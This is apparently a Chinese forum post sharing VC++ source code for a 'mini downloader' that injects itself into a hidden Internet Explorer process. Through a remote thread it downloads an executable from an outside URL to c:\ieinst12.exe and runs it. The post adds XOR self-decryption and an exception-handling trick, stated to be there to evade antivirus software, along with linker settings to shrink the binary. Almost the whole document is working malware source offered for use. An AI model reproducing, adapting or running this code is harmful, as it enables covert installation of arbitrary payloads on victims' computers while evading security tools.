无dll插入进程，下载者vc源代码

无dll插入进程，下载者vc源代码

增加代码xor解密功能,以逃过杀毒软件.

生成mini下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可.

参考delphi版本的下载者源代码，编出来有16k左右。压缩也有10k多，
于是写了vc的代码。按以下的设置，编译出来2k左右。
还可以可以再设置一下编译开关，以减小体积。

ps:原代码中4处没有对转义,以下代码编译通过;
编译出来16k,去掉4行注释,编译后3k(编译环境:win2003+vc6.0)
/*
“mini_downloader”
code by kardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>

#pragma comment(lib,”user32.lib”)
#pragma comment(lib,”kernel32.lib”)

//#pragma comment(linker, “/opt:nowin98”) //取消这4行的注释，可编译出2k大的文件
//#pragma comment(linker, “/merge:.data=.text”)
//#pragma comment(linker, “/merge:.rdata=.text”)
//#pragma comment(linker, “/align:0x200”)
#pragma comment(linker, “/entry:decrpt”)
#pragma comment(linker, “/subsystem:windows”)
#pragma comment(linker, “/base:0x13150000”)

hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );//动态加载shell32.dll中的shellexecutea函数
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);//动态加载urlmon.dll中的urldownloadtofilea函数
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); //建立远程线程,并运行
handle processhandle;
dword pid;
hinstance hshell,hurlmon,hkernel;

void download() //注入使用的下载函数
{
hshell=loadlibrary(“shell32.dll”);
hurlmon=loadlibrary(“urlmon.dll”);

(farproc&)shellrun=getprocaddress(hshell,”shellexecutea”);
(farproc&)downfile= getprocaddress(hurlmon,”urldownloadtofilea”);

downfile(null,”http://www.testtest.ac.cn/eeeeeeeeeeeeee … eeeeen/notepad.exe”,”c:\ieinst12.exe”,0, null);
shellrun(0,”open”,”c:\ieinst12.exe”,null,null,5);
exitprocess(0);
};

void main() //主函数
{
//1.得到ie路径,并运行
char iename[max_path],iepath[max_path];
zeromemory(iename,sizeof(iename));
zeromemory(iepath,sizeof(iepath));

getwindowsdirectory(iepath,max_path);
strncpy(iename,iepath,3);
strcat(iename,”program files\internet explorer\iexplore.exe”);
winexec(iename,sw_hide);
sleep(500);

//2.得到 ie process handle
hwnd htemp;
htemp=findwindow(“ieframe”,null);
getwindowthreadprocessid(htemp,&pid);
processhandle=openprocess(process_all_access, false, pid);

//3.分配内存
hmodule module;
lpvoid newmodule;
dword size;
lpdword lpimagesize;

module = getmodulehandle(null);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
size=(dword)lpimagesize;
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); //确定起始基址和内存映像基址的位置

//4.写内存，创建线程

writeprocessmemory(processhandle, newmodule, module, size, null);//写数据
lpthread_start_routine entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=loadlibrary(“kernel32.dll”);
(farproc&)myinject= getprocaddress(hkernel,”createremotethread”);
myinject(processhandle, null, 0, entrypoint, module, 0, null); //建立远程线程,并运行

//5.关闭对象
closehandle(processhandle);

return;
} ;

//解密函数
void decrpt()
{

handle myps;
dword oldattr;
byte shellcode[500];
zeromemory(shellcode,sizeof(shellcode));
myps=getcurrentprocess();
::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr);
//先把原代码,搬移到变量中保存起来
_asm
{
pushad;
lea esi,download
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;

};

//解密搬回
int i;
for (i=1;i<=0xff;i++)
{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;

};

//此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
__try
{
main();
return;
}
__except(exception_execute_handler)

{

};

}
return;
};